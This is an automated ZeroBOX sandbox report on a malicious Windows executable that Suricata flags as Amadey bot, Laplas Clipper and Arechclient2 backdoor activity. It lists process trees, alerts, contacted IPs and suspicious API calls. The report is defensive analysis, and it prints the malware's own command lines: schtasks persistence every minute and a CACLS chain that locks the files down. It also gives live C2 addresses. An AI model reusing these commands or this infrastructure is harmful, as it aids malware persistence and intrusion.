Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	May 31, 2023, 5:46 p.m.	May 31, 2023, 5:57 p.m.

Size	4.8MB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`7338191364d7eb9a6f697f08833b7fe4`
SHA256	`dafd690a0903499113b0f9c6e96f48fe5516dda430c2ba7cb3a0ca0527fae204`
CRC32	`CDEEED15`
ssdeep	`98304:PSUHKFydXk7ydjWRfHEvTvG23jJJ77DzlThQM5Yd1wWjQM8fATPsaZlxrdVyZ:PEFydXk+JWRv4zG4jJJ7zlThQgu4fyBY`
Yara	PE_Header_Zero - PE File Signature IsPE32 - (no description) Malicious_Packer_Zero - Malicious Packer

jjjj.exe "C:\Users\test22\AppData\Local\Temp\jjjj.exe"
1984
- npsvga64.exe "C:\Users\test22\AppData\Local\Temp\6bb5824ec4\npsvga64.exe"
  2112
  - schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN npsvga64.exe /TR "C:\Users\test22\AppData\Local\Temp\6bb5824ec4\npsvga64.exe" /F
    2204
  - cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "npsvga64.exe" /P "test22:N"&&CACLS "npsvga64.exe" /P "test22:R" /E&&echo Y|CACLS "..\6bb5824ec4" /P "test22:N"&&CACLS "..\6bb5824ec4" /P "test22:R" /E&&Exit
    2264
    - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
      2340
    - cacls.exe CACLS "npsvga64.exe" /P "test22:N"
      2380
    - cacls.exe CACLS "npsvga64.exe" /P "test22:R" /E
      2432
    - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
      2480
    - cacls.exe CACLS "..\6bb5824ec4" /P "test22:N"
      2516
    - cacls.exe CACLS "..\6bb5824ec4" /P "test22:R" /E
      2572
  - unsecapp.exe "C:\Users\test22\AppData\Roaming\1000219050\unsecapp.exe"
    2660
  - tcpupdate.exe "C:\Users\test22\AppData\Roaming\1000223050\tcpupdate.exe"
    2852
    - AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe"
      1372
explorer.exe C:\Windows\Explorer.EXE
1236

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
162.55.188.246	Active	Moloch
162.55.212.236	Active	Moloch
45.159.189.105	Active	Moloch
78.47.9.120	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49175 -> 162.55.212.236:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49174 -> 78.47.9.120:80	2027700	ET MALWARE Amadey CnC Check-In	Malware Command and Control Activity Detected
TCP 192.168.56.103:49174 -> 78.47.9.120:80	2045751	ET MALWARE Win32/Amadey Bot Activity (POST) M2	A Network Trojan was detected
TCP 162.55.212.236:80 -> 192.168.56.103:49175	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 162.55.212.236:80 -> 192.168.56.103:49175	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 162.55.212.236:80 -> 192.168.56.103:49175	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49177 -> 78.47.9.120:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.103:49178 -> 162.55.212.236:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 162.55.212.236:80 -> 192.168.56.103:49178	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 162.55.212.236:80 -> 192.168.56.103:49178	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 162.55.212.236:80 -> 192.168.56.103:49178	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49177 -> 78.47.9.120:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.103:49180 -> 45.159.189.105:80	2039775	ET MALWARE Laplas Clipper - Regex CnC Request	A Network Trojan was detected
TCP 192.168.56.103:49180 -> 45.159.189.105:80	2039776	ET MALWARE Laplas Clipper - SetOnline CnC Checkin	A Network Trojan was detected
TCP 192.168.56.103:49180 -> 45.159.189.105:80	2039775	ET MALWARE Laplas Clipper - Regex CnC Request	A Network Trojan was detected
TCP 192.168.56.103:49180 -> 45.159.189.105:80	2039776	ET MALWARE Laplas Clipper - SetOnline CnC Checkin	A Network Trojan was detected
TCP 162.55.188.246:15647 -> 192.168.56.103:49184	2029217	ET MALWARE Arechclient2 Backdoor CnC Init	Malware Command and Control Activity Detected
TCP 192.168.56.103:49173 -> 78.47.9.120:80	2044597	ET MALWARE Amadey Bot Activity (POST) M1	A Network Trojan was detected

Suricata TLS

No Suricata TLS

Queries for the computername (16 events)

Time & API	Arguments	Status	Return
GetComputerNameW May 31, 2023, 5:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 31, 2023, 5:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 31, 2023, 5:47 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 31, 2023, 5:48 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 31, 2023, 5:48 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 31, 2023, 5:48 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 31, 2023, 5:48 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 31, 2023, 5:48 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 31, 2023, 5:48 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 31, 2023, 5:48 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 31, 2023, 5:48 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 31, 2023, 5:48 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 31, 2023, 5:48 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 31, 2023, 5:48 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 31, 2023, 5:48 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 31, 2023, 5:48 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (50 out of 345 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent May 31, 2023, 5:46 p.m.			0	0
IsDebuggerPresent May 31, 2023, 5:46 p.m.			0	0
IsDebuggerPresent May 31, 2023, 5:46 p.m.			0	0
IsDebuggerPresent May 31, 2023, 5:46 p.m.			0	0
IsDebuggerPresent May 31, 2023, 5:46 p.m.			0	0
IsDebuggerPresent May 31, 2023, 5:46 p.m.			0	0
IsDebuggerPresent May 31, 2023, 5:46 p.m.			0	0
IsDebuggerPresent May 31, 2023, 5:46 p.m.			0	0
IsDebuggerPresent May 31, 2023, 5:46 p.m.			0	0
IsDebuggerPresent May 31, 2023, 5:46 p.m.			0	0
IsDebuggerPresent May 31, 2023, 5:46 p.m.			0	0
IsDebuggerPresent May 31, 2023, 5:46 p.m.			0	0
IsDebuggerPresent May 31, 2023, 5:46 p.m.			0	0
IsDebuggerPresent May 31, 2023, 5:46 p.m.			0	0
IsDebuggerPresent May 31, 2023, 5:46 p.m.			0	0
IsDebuggerPresent May 31, 2023, 5:46 p.m.			0	0
IsDebuggerPresent May 31, 2023, 5:46 p.m.			0	0
IsDebuggerPresent May 31, 2023, 5:46 p.m.			0	0
IsDebuggerPresent May 31, 2023, 5:46 p.m.			0	0
IsDebuggerPresent May 31, 2023, 5:46 p.m.			0	0
IsDebuggerPresent May 31, 2023, 5:46 p.m.			0	0
IsDebuggerPresent May 31, 2023, 5:46 p.m.			0	0
IsDebuggerPresent May 31, 2023, 5:46 p.m.			0	0
IsDebuggerPresent May 31, 2023, 5:46 p.m.			0	0
IsDebuggerPresent May 31, 2023, 5:46 p.m.			0	0
IsDebuggerPresent May 31, 2023, 5:46 p.m.			0	0
IsDebuggerPresent May 31, 2023, 5:46 p.m.			0	0
IsDebuggerPresent May 31, 2023, 5:46 p.m.			0	0
IsDebuggerPresent May 31, 2023, 5:47 p.m.			0	0
IsDebuggerPresent May 31, 2023, 5:47 p.m.			0	0
IsDebuggerPresent May 31, 2023, 5:47 p.m.			0	0
IsDebuggerPresent May 31, 2023, 5:47 p.m.			0	0
IsDebuggerPresent May 31, 2023, 5:47 p.m.			0	0
IsDebuggerPresent May 31, 2023, 5:47 p.m.			0	0
IsDebuggerPresent May 31, 2023, 5:47 p.m.			0	0
IsDebuggerPresent May 31, 2023, 5:47 p.m.			0	0
IsDebuggerPresent May 31, 2023, 5:47 p.m.			0	0
IsDebuggerPresent May 31, 2023, 5:47 p.m.			0	0
IsDebuggerPresent May 31, 2023, 5:47 p.m.			0	0
IsDebuggerPresent May 31, 2023, 5:47 p.m.			0	0
IsDebuggerPresent May 31, 2023, 5:47 p.m.			0	0
IsDebuggerPresent May 31, 2023, 5:47 p.m.			0	0
IsDebuggerPresent May 31, 2023, 5:47 p.m.			0	0
IsDebuggerPresent May 31, 2023, 5:47 p.m.			0	0
IsDebuggerPresent May 31, 2023, 5:47 p.m.			0	0
IsDebuggerPresent May 31, 2023, 5:47 p.m.			0	0
IsDebuggerPresent May 31, 2023, 5:47 p.m.			0	0
IsDebuggerPresent May 31, 2023, 5:47 p.m.			0	0
IsDebuggerPresent May 31, 2023, 5:47 p.m.			0	0
IsDebuggerPresent May 31, 2023, 5:47 p.m.			0	0

Command line console output was observed (50 out of 79 events)

Time & API	Arguments	Status	Return
WriteConsoleW May 31, 2023, 5:46 p.m.	buffer: SUCCESS: The scheduled task "npsvga64.exe" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2023, 5:46 p.m.	buffer: A console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2023, 5:46 p.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2023, 5:46 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2023, 5:46 p.m.	buffer: y console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2023, 5:46 p.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2023, 5:46 p.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2023, 5:46 p.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2023, 5:46 p.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2023, 5:46 p.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2023, 5:46 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2023, 5:46 p.m.	buffer: Y console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2023, 5:46 p.m.	buffer: N console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2023, 5:46 p.m.	buffer: p console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2023, 5:46 p.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2023, 5:46 p.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2023, 5:46 p.m.	buffer: c console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2023, 5:46 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2023, 5:46 p.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2023, 5:46 p.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2023, 5:46 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2023, 5:46 p.m.	buffer: d console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2023, 5:46 p.m.	buffer: f console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2023, 5:46 p.m.	buffer: i console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2023, 5:46 p.m.	buffer: l console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2023, 5:46 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleW May 31, 2023, 5:46 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\6bb5824ec4\npsvga64.exe console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2023, 5:46 p.m.	buffer: p console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2023, 5:46 p.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2023, 5:46 p.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2023, 5:46 p.m.	buffer: c console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2023, 5:46 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2023, 5:46 p.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2023, 5:46 p.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2023, 5:46 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2023, 5:46 p.m.	buffer: d console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2023, 5:46 p.m.	buffer: f console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2023, 5:46 p.m.	buffer: i console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2023, 5:46 p.m.	buffer: l console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2023, 5:46 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleW May 31, 2023, 5:46 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\6bb5824ec4\npsvga64.exe console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2023, 5:46 p.m.	buffer: A console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2023, 5:46 p.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2023, 5:46 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2023, 5:46 p.m.	buffer: y console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2023, 5:46 p.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2023, 5:46 p.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2023, 5:46 p.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2023, 5:46 p.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2023, 5:46 p.m.	buffer: r console_handle: 0x00000007	1	1

Uses Windows APIs to generate a cryptographic key (15 events)

Time & API	Arguments	Status	Return
CryptExportKey May 31, 2023, 5:47 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000802360 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 31, 2023, 5:47 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000008023d0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 31, 2023, 5:47 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000008023d0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 31, 2023, 5:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00612980 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2023, 5:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00612980 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2023, 5:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00612840 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2023, 5:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00613100 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2023, 5:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00613100 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2023, 5:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00613080 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2023, 5:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00613100 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2023, 5:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00613100 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2023, 5:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00613080 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2023, 5:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00613100 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2023, 5:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00613140 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2023, 5:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00613140 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Tries to locate where the browsers are installed (3 events)

file	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
file	C:\Program Files\Mozilla Firefox\firefox.exe
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx May 31, 2023, 5:46 p.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (8 events)

section	/SyPw;BQ
section	CT$TVfgq
section	B7ua^dcQ
section	:hjB\xl9
section	y&t(WrUj
section	Rh+KXR%k
section	Sq`,p<3n
section	rv5i>zmU

One or more processes crashed (9 events)

Time & API	Arguments	Status
__exception__ May 31, 2023, 5:47 p.m.	stacktrace: CopyPDBs+0x1b552 DllCanUnloadNowInternal-0x25a85 clr+0x1b1194 @ 0x73091194 LogHelp_TerminateOnAssert+0x14061 GetPrivateContextsPerfCounters-0x53e1 clr+0x82ba1 @ 0x72f62ba1 0xc62e4e DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x72f61838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x72f61737 mscorlib+0x2d3711 @ 0x721f3711 mscorlib+0x2cf92a @ 0x721ef92a 0xb0bcf9 0xb0818b 0xe50da0 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x72f61838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x72f61737 mscorlib+0x2d3711 @ 0x721f3711 mscorlib+0x2cf92a @ 0x721ef92a 0xb0bcf9 0xb0818b 0xc60e66 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x72f61838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x72f61737 mscorlib+0x2d3711 @ 0x721f3711 mscorlib+0x2cf92a @ 0x721ef92a 0xb0bcf9 0xb0818b 0xb0c070 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73e2f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73ea7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73ea4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0xe0434f4e exception.offset: 46887 exception.address: 0x7559b727 registers.esp: 4382972 registers.edi: 0 registers.eax: 4382972 registers.ebp: 4383052 registers.edx: 0 registers.ebx: 5691976 registers.esi: 5074032 registers.ecx: 650750694	1
__exception__ May 31, 2023, 5:47 p.m.	stacktrace: CopyPDBs+0x1b552 DllCanUnloadNowInternal-0x25a85 clr+0x1b1194 @ 0x73091194 LogHelp_TerminateOnAssert+0x14061 GetPrivateContextsPerfCounters-0x53e1 clr+0x82ba1 @ 0x72f62ba1 0xc62f6d DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x72f61838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x72f61737 mscorlib+0x2d3711 @ 0x721f3711 mscorlib+0x2cf92a @ 0x721ef92a 0xb0bcf9 0xb0818b 0xe50da0 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x72f61838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x72f61737 mscorlib+0x2d3711 @ 0x721f3711 mscorlib+0x2cf92a @ 0x721ef92a 0xb0bcf9 0xb0818b 0xc60e66 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x72f61838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x72f61737 mscorlib+0x2d3711 @ 0x721f3711 mscorlib+0x2cf92a @ 0x721ef92a 0xb0bcf9 0xb0818b 0xb0c070 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73e2f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73ea7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73ea4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0xe0434f4e exception.offset: 46887 exception.address: 0x7559b727 registers.esp: 4382972 registers.edi: 0 registers.eax: 4382972 registers.ebp: 4383052 registers.edx: 0 registers.ebx: 5691976 registers.esi: 5074032 registers.ecx: 650750694	1
__exception__ May 31, 2023, 5:47 p.m.	stacktrace: CopyPDBs+0x1b552 DllCanUnloadNowInternal-0x25a85 clr+0x1b1194 @ 0x73091194 LogHelp_TerminateOnAssert+0x14061 GetPrivateContextsPerfCounters-0x53e1 clr+0x82ba1 @ 0x72f62ba1 0xc6151a DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x72f61838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x72f61737 mscorlib+0x2d3711 @ 0x721f3711 mscorlib+0x2cf92a @ 0x721ef92a 0xb0bcf9 0xb0818b 0xc60e66 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x72f61838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x72f61737 mscorlib+0x2d3711 @ 0x721f3711 mscorlib+0x2cf92a @ 0x721ef92a 0xb0bcf9 0xb0818b 0xb0c070 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73e2f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73ea7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73ea4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0xe0434f4e exception.offset: 46887 exception.address: 0x7559b727 registers.esp: 4384288 registers.edi: 0 registers.eax: 4384288 registers.ebp: 4384368 registers.edx: 0 registers.ebx: 5691976 registers.esi: 5074032 registers.ecx: 650751430	1
